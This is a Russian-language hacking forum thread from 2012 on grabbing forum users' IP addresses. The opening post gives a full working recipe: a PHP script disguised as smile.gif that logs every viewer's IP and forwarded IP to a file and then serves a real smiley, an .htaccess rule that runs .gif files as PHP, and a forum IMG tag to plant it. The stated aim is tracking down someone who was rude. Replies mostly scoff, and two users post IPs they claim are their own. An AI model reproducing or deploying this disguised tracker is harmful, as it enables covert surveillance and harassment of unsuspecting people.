Форумы Воруем Айпишники с форума

Discussion in 'Уязвимости CMS/форумов' started by tickhack, 17 May 2012.

  1. tickhack

    tickhack New Member

    Joined:
    24 Jan 2012
    Messages:
    11
    Likes Received:
    4
    Reputations:
    -10
    Ну я полагаю грабинг IP с форумов вешь ещё актуальная. Порой хочется найти человека, нагрубившего тебе и т.п. Сейчаас мы этим и займёмся, помните легендарный смайл с basic авторизацией? Сечас мы попробуем изобразить что-то типа этого.

    Ход работы

    Открываем блокнот, в нём пишем:
    Code:
    <?php  
    
    $smile = "bz.gif"; //Настоящий смайлик 
    $file = 'ip.txt'; //Файл, куда пишем результат 
    
    $ip = $_SERVER['REMOTE_ADDR']; //Получаем IP 
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) $rip = $_SERVER['HTTP_CLIENT_IP']; //Определяем реальный IP  
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) $rip = $_SERVER['HTTP_X_FORWARDED_FOR'];   
    else $rip = $_SERVER['REMOTE_ADDR']; 
    $f = fopen($file,"a+t"); //Открываем файл для записи данных 
    fputs ($f,"IP: ".$ip."\n"."Real_IP: ".$rip."\n"."-------------------\n"); //Пишем в файл 
    
    fclose($f); //Закрываем файл 
    
    $img = file_get_contents($smile); //Получаем содержимое смайла 
    header('Content-type: image/gif'); //указываем браузеру, что наш скрипт, это ничто иное, как картинка 
    echo $img; //Выводим имагу 
    
    
    ?>
    Это собственно и есть фейковый смайл, в коде я расставил коментарии - вроде всё понятно. Далее сохраняем только что написанный код с именем smile.gif. Далее заходим на любой форум(где разрешены имг теги) и сохраняем к себе дюбой понравившийся вам смайлик., кидаем его в ту же папку, гдк у вас лежит smile.gif, открываем опять блокнотом файл smile.gif и в случае надобности правим эту строчку под себя:
    Code:
    $smile = "bz.gif"; //Настоящий смайлик 
    Затем создаём файл .htaccess с таким вот содержимым:
    Code:
    <Files "smile.gif"> 
    AddType application/x-httpd-php .gif 
    </Files> 
    И кидаем его в ту же папку. Теперь у нас smile.gif теперь php код в smile.gif будет работать. Создаем пустой текстовой файл ip.txt. Кидаем все четыре файла на хостинг и ставим chmod 777 на ip.txt.
    На форуме, в сообщени, вставляем:
    Code:
    [IMG*]http://хост/smile.gif[*/IMG]
    конечно без *
    ждём минут десять(зависит от того сколько людей проссмотрят наш смайлик), идём и смотрим наш ip.txt и видим записи вида:
    Code:
    IP: 123.321.123.321
     Real_IP: 123.321.123.321
     -------------------
    Где ip - это ip, Real_IP - реальный ip адрес(определяется если используется прозрачный прокси-сервер).

    Вообщем мораль сей басни такова: Следите за своей анонимностью!!!
    Источник
     
    1 person likes this.
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    мда.... прим Америку открыл, ну и толку с того айпи???

    ага, найти, канешно, вот мой ип 188.247.115.144 приедь и найли меня :D
     
  3. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Ты не шаришь, не мешай человеку просвещать ачат.
    Найти по айпи реально и просто, куча книг даже написана:
    [​IMG]
     
    1 person likes this.
  4. tickhack

    tickhack New Member

    Joined:
    24 Jan 2012
    Messages:
    11
    Likes Received:
    4
    Reputations:
    -10
    А вот это ты уже зря выложил.
    Почитать как можно найти компьютер по айпишнику можешь например тут : http://www.xakep.ru/post/33708/ :)
     
    #4 tickhack, 18 May 2012
    Last edited: 18 May 2012
  5. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    а вот мой 99.50.111.106
     
  6. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Ну можно напугать так человека, хотя вряд ли кто испугается, а так я это еще в 2008 году делал.
     
    _________________________
  7. BassCreator

    BassCreator New Member

    Joined:
    27 Oct 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Область применения таких данных довольно узка и специфична, но в некоторых случаях информация об IP может пригодиться.
     
  8. daniel777

    daniel777 Elder - Старейшина

    Joined:
    8 Jul 2010
    Messages:
    517
    Likes Received:
    90
    Reputations:
    37
    А если использовать например на античате, где находится много людей, как выделять где чей IP?
    Разве что отправлять в личку...
     
    1 person likes this.